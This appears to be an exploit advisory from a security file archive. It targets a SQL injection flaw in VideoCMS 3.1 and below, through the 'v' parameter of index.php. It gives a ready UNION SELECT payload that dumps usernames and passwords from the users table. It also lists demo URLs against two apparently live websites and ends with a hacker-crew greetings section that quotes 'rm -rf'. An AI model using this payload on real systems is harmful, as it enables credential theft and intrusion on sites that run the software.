VideoCMS 3.1 SQL Injection

VideoCMS 3.1 SQL Injection: Posted Dec 22, 2009; Authored by kaMtiEz | Site indonesiancoder.com; VideoCMS versions 3.1 and below suffer from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 03de0864ab74b69ff0ad2002a474fc0bee9193808f77128f5ce4e3dc28cf0a12; Download | Favorite | View

VideoCMS 3.1 SQL Injection

###################################################################################
                                                                                  #
[~] VideoCMS SQL injection vulnerability - (id)                                   #
[~] Author  : kaMtiEz (kamzcrew@gmail.com)                                    #
[~] Homepage  : http://www.indonesiancoder.com                                  #
[~] Date  : Desember 14, 2009                                               #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.codemight.com/
[+] Download : -
[+] version : 3.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno            
[+] Location : INDONESIA - JOGJA
[+] description http://www.codemight.com/index.php?m=product&p=1

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?m=video&v=[VALID-ID][SQL]

[ Exploit ]

/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

[ Demo ]

http://mysingaporetube.com/index.php?m=video&v=502/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--
http://www.codemight.com/videocms/index.php?m=video&v=23/**/and/**/1=2/**/union/**/all/**/select/**/666,666,@@version,concat_ws(0x3a,username,password),666,666,666/**/from/**/users--

===========================================================================

[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] segelas vodka menemaniku setiap malam .. :P
[+] Dengerin Radio yach di http://antisecradio.fm ok coy ?

[ QUOTE ]

[+] rm -rf 

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

VideoCMS 3.1 SQL Injection

VideoCMS 3.1 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

VideoCMS 3.1 SQL Injection

Share This

VideoCMS 3.1 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems